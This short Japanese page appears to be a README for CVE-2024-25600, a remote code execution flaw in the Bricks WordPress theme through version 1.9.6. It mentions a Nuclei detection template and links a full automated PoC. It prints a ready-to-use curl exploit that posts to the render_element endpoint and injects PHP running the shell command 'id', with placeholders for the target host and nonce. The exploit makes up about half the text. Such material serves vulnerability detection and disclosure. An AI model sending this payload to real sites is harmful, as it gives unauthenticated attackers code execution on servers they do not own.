
CVE-2024-25600 の PoC に関する Nuclei テンプレートと情報
CVE-2024-25600 に関する Nuclei テンプレートと PoC の情報
WordPress 用の Bricks テーマは、バージョン 1.9.6 までのすべてのバージョンにおいてリモートコード実行の脆弱性があります。これにより、認証されていない攻撃者がサーバー上でコードを実行できる可能性があります。 このテンプレート 🛠️ は、nuclei を使用して WordPress 用 Bricks Builder プラグインに見つかった CVE-2024-25600 の脆弱性 🕳️ を検出するように設計されています。この脆弱性により、影響を受けるウェブサイト 💻 で認証されていないリモートコード実行が可能になります。
完全な PoC (自動) は https://github.com/chocapikk/CVE-2024-25600 で入手できます。
開示によって提供された基本 PoC は以下の通りです。
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}'
[HOST] をターゲットのウェブサイトに、[NONCE] をサイトから取得した nonce 値に置き換えてください。
CVE-2024-25600 の脆弱性の詳細については、Snicco.io の詳細な開示を参照してください。